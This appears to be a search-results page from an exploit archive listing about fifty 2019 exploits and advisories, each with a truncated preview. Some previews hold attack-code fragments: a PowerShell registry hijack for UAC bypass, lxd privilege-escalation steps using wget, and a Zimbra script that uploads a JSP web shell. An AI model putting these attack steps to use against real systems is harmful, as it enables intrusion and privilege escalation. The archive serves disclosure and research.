47884 matches found
Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL:...
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)
Interactive Version: function SluiHijackBypass Param ParameterMandatory=$True String$command, ValidateSet64,86 int$arch = 64 Create registry structure New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Na...
Thunderbird ESR < 60.7.XXX - Type Confusion
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-004 Type confusion in Thunderbird ============================= Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor:...
Netperf 2.6.0 - Stack-Based Buffer Overflow
Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking. It provides tests for both unidirectional troughput...
RedwoodHQ 2.5.5 - Authentication Bypass
-- encoding: utf-8 -- !/usr/bin/python3 Exploit Title: RedxploitHQ Create Admin User by missing authentication on db Date: 14-june-2019 Exploit Author: EthicalHCOP Version: 2.0 / 2.5.5 Vendor Homepage: https://redwoodhq.com/ Software Link: https://redwoodhq.com/redwood-download/ Tested on: Ubuntu...
Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-003 Stack-based buffer overflow in Thunderbird ========================================== Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL:...
Spring Security OAuth - Open Redirector
Exploit Title: Open Redirector in spring-security-oauth2 Date: 17 June 2019 Exploit Author: Riemann Vendor Homepage: https://spring.io/projects/spring-security-oauth Software Link: https://spring.io Version: Spring Security OAuth versions 2.3 prior to 2.3.6...
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Product HC10 HC.Server Service 10.14 HC10 is a unified hosting...
CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities
Advisory Information ======================================== Title: Clever Dog Smart Camera Vendor Homepage: http://www.cleverdog.com.cn/ Tested on Camera types : DOG-2W, DOG-2W-V4 Vulnerability: Hardware- Multiple Vulnerabilities Date: 14/06/2019 Author: Alex Akinbi Twitter: @alexakinbi 1...
AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AROX School-ERP Pro Unauthenticated Remote Code Execution", 'Description' = %q This module exploits a command execution vulnerability in AROX...
CentOS 7.6 - 'ptrace_scope' Privilege Escalation
!/usr/bin/env bash 'ptracescope' misconfiguration Local Privilege Escalation Affected operating systems TESTED: Parrot Home/Workstation 4.6 Latest Version Parrot Security 4.6 Latest Version CentOS / RedHat 7.6 Latest Version Kali Linux 2018.4 Latest Version Authors: Marcelo Vazquez s4vitar Victor...
Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow
!/usr/bin/python Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit Author : Nipun Jaswal Tested On : Windows 7 Home Basicx86 Version : 6.00.5100 Release Date : 31/May/2019 Build : 21/May/2019 Vendor Homepage: https://www.aida64.com/downloads Software Link:...
Sitecore 8.x - Deserialization Remote Code Execution
Exploit Title: Sitecore v 8.x Deserialization RCE Date: Reported to vendor October 2018, fix released April 2019. Exploit Author: Jarad Kopf Vendor Homepage: https://www.sitecore.com/ Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx Version: Sitecore 8.0 Revision 150802...
Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation
Summary The Pronestor service "PNHM" aka Health Monitoring or HealthMonitor before 8.1.12.0 has "BUILTIN\Users:IF" permissions for the "%PROGRAMFILESX86%\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe" file, which allows local users to gain privileges via a Trojan horse...
FusionPBX 4.4.3 - Remote Command Execution
Exploit Title: FusionPBX = 4.4.3 Command Injection RCE via XSS Date: 06-11-2019 Exploit Author: Dustin Cobb Vendor Homepage: https://www.fusionpbx.com Software Link: https://https://github.com/fusionpbx/fusionpbx Version: = 4.4.3 Tested on: Debian 8.11 CVE : CVE-2019-11408 XSS AND CVE-2019-11409...
phpMyAdmin 4.8 - Cross-Site Request Forgery
Exploit Title: Cross Site Request Forgery CSRF Date: 11 June 2019 Exploit Author: Riemann Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: 4.8 Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 CVE ...
ProShow 9.0.3797 - Local Privilege Escalation
!/usr/bin/python coding:utf-8 Exploit Title: ProShow v9.0.3797 Local Exploit Exploit Author: @YonatanCorrea website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html Vendor Homepage: http://www.photodex.com/ProShow Software Link:...
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin Package Updates Remote Command Execution', 'Description' = %q This module exploits an arbitrary command execution vulnerability in Webmin...
WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution
Exploit Title: Authenticated code execution in insert-or-embed-articulate-content-into-wordpress Wordpress plugin Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive Date: june 2019 Exploit Author: xulchibalraa Vendor Homepage:...
Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting
Exploit Title: Liferay Portal ” / or ” /. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability. Poc In a sample scenario of custom code calling the ” / JSP taglib, appending a payload like the following to...
UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting
Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting Google Dork: intext:"by UliCMS" Date: 2019-05-12 Exploit Author: Unk9vvN Vendor Homepage: https://en.ulicms.de Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig Version: 2019....
Ubuntu 18.04 - 'lxd' Privilege Escalation
!/usr/bin/env bash ---------------------------------- Authors: Marcelo Vazquez S4vitar Victor Lasa vowkin ---------------------------------- Step 1: Download build-alpine = wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine Attacker Machine Step 2: Build alpine =...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)
CVE-2019-0841 BYPASS 2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within "c:\users%username%\appdata\local\packages\Microsoft.MicrosoftEdge8wekyb3d8bbwe" atleast the ones we can delete as user Try to launch edge. It will crash...
VMware WorkStation 12.5.3 - Virtual Machine Escape
VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.3 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 Known issues Failing to heap manipulation causes host process crash. About 50% successful rate Not quite elaborate because I'm not good at doing...
Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion
Exploit Title: Remote file inclusion Date: 03-06-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://supra.ru Software Link: https://supra.ru/catalog/televizory/televizorsuprastvlc40lt0020f/ CVE: CVE-2019-12477 References: https://nvd.nist.gov/vuln/detail/CVE-2019-12477...
LibreNMS - addhost Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LibreNMS addhost Command Injection', 'Description' = %q This module exploits a command injection vulnerability in the open source network...
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution', 'Description' = % This module exploits...
Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free
memoryobject, uint32t pages ... Handle newbuffer; if oldbuffer-isshared // Adjust protections for the buffer. if !AdjustBufferPermissionsisolate, oldbuffer, newsize return -1; void backingstore = oldbuffer-backingstore; if memorytracker-IsWasmSharedMemorybackingstore // This memory is shared...
Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
coding=utf8 import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disablewarningsInsecureRequestWarning baseurl=sys.argv1 baseurl=baseurl.rstrip"/" upload file name and content modify by k8gege Connect "shell.jsp" using K8fly...
Exim 4.87 < 4.91 - (Local / Remote) Command Execution
Qualys Security Advisory The Return of the WIZard: RCE in Exim CVE-2019-10149 ======================================================================== Contents ======================================================================== Summary Local exploitation Remote exploitation - Non-default...
Cisco RV130W 1.0.3.44 - Remote Stack Overflow
!/usr/bin/python Exploit Title: Cisco RV130W Remote Stack Overflow Google Dork: n/a Date: Advisory Published: Feb 2019 Exploit Author: @0x00string Vendor Homepage: cisco.com Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html Version...
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting
Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho ManageEngine ServiceDesk Plus 9.3 CVE :...
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting
Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho ManageEngine ServiceDesk Plus 9.3 CVE :...
Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting
Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho ManageEngine ServiceDesk Plus 9.3 CVE :...
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting
Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage: https://www.manageengine.com/products/service-desk Version: Zoho ManageEngine ServiceDesk Plus 9.3 CVE :...
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution
by Arminius @rawsec Vim/Neovim Arbitrary Code Execution via Modelines ================================================= Product: Vim 8.1.1365, Neovim 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius @rawsec Summary ------- Vim before 8.1.1365 and Neovim...
IceWarp 10.4.4 - Local File Inclusion
Exploit Title: IceWarp =10.4.4 local file include Date: 02/06/2019 Exploit Author: JameelNabbo Website: uitsec.com Vendor Homepage: http://www.icewarp.com Software Link: https://www.icewarp.com/downloads/trial/ Version: 10.4.4 Tested on: Windows 10 CVE: CVE-2019-12593 POC:...
DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)
Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH Date: 6-3-2019 Exploit Author: Kevin Randall Vendor Homepage: http://www.dvd-x-player.com/download.htmldvdPlayer Software Link: http://www.dvd-x-player.com/download.htmldvdPlayer Version: 5.5 Pro Tested on: Windows 7 CVE : N/A...
NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow
!/usr/bin/python Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow Google Dork: n/a Date: Advisory Published: Nov 18 Exploit Author: @0x00string Vendor Homepage: nuuo.com Software Link: https://www.nuuo.com/ProductNode.php?node=2 Version: 3.9.1 and prior Tested on: 3.9.1 CVE :...
Nvidia GeForce Experience Web Helper - Command Injection
//Send request to local GFE server function submitRequestport,secret var xhr = new XMLHttpRequest; xhr.open"POST", "http://127.0.0.1:"+port+"/gfeupdate/autoGFEInstall/", true; xhr.setRequestHeader"Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8";...
AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control
Exploit Title: AUO Solar Data Recorder - Incorrect Access Control Date: 2019-04-16 Exploit Author: Luca.Chiou Vendor Homepage: https://www.auo.com/zh-TW Version: AUO Solar Data Recorder all versions prior to v1.3.0 Tested on: It is a proprietary devices:...
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities
Exploit Title: Dell Kace Appliance Multiple Vulnerabilities Date: 12/04/2018 Exploit Author: SlidingWindow, Twitter: @kapilkhot Vendor Homepage: https://www.quest.com/products/kace-systems-management-appliance/ Affected Versions: KACE SMA versions prior to 9.0.270 PATCH SEC201820180410 Tested on:...
WordPress Plugin Form Maker 1.13.3 - SQL Injection
-- coding: utf-8 -- Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection Date: 22-03-2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://10web.io/plugins/ Software Link: https://wordpress.org/plugins/form-maker/ Version: 1.13.3 Tested on: Ubuntu 18.04 CVE :...
Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service
import socket, sys, struct from OpenSSL import SSL from impacket.structure import Structure I'm not responsible for what you use this to accomplish and should only be used for education purposes Could clean these up since I don't even use them class TPKTStructure: commonHdr = 'Version','B=3',...
Free SMTP Server 2.5 - Denial of Service (PoC)
Exploit Title: Free SMTP Server - Local Denial of Service Crash PoC Date: February 3, 2009 Exploit Author: Metin Kandemir kandemir Vendor Homepage: http://www.softstack.com/freesmtp.html Software Link: https://free-smtp-server.en.uptodown.com/windows/download Version: 2.5 Tested on: Windows 7...
pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting
Exploit Title: pfSense 2.4.4-p3 ACMEPackage 0.5.71 - Stored Cross-Site Scripting Date: 05.28.2019 Exploit Author: Chi Tran Vendor Homepage: https://www.pfsense.org Version: 2.4.4-p3/0.5.71 Software Link: N/A Google Dork: N/A CVE:2019-12347 Introduction pfSense® software is a free, open source...
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL
The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: When kgslmementrydestroy in drivers/gpu/msm/kgsl.c is called for a writable entry with memtype KGSLMEMENTRYUSER, it attempts to mark the entry's pages as dirty...
Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation
While fuzzing Spidermonkey, I encountered the following commented and modified JavaScript program which crashes debug builds of the latest release version of Spidermonkey from commit https://github.com/mozilla/gecko-dev/commit/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c: function O1 this.s = 'foobar...
Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment', 'Description' = %q This module abuses a feature in...
Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script
IonMonkey can, during a bailout, leak an internal JSOPTIMIZEDOUT magic value to the running script. This magic value can then be used to achieve memory corruption. Prerequisites Magic Values Spidermonkey represents JavaScript values with the C++ type JS::Value 1, which is a NaN-boxed value that c...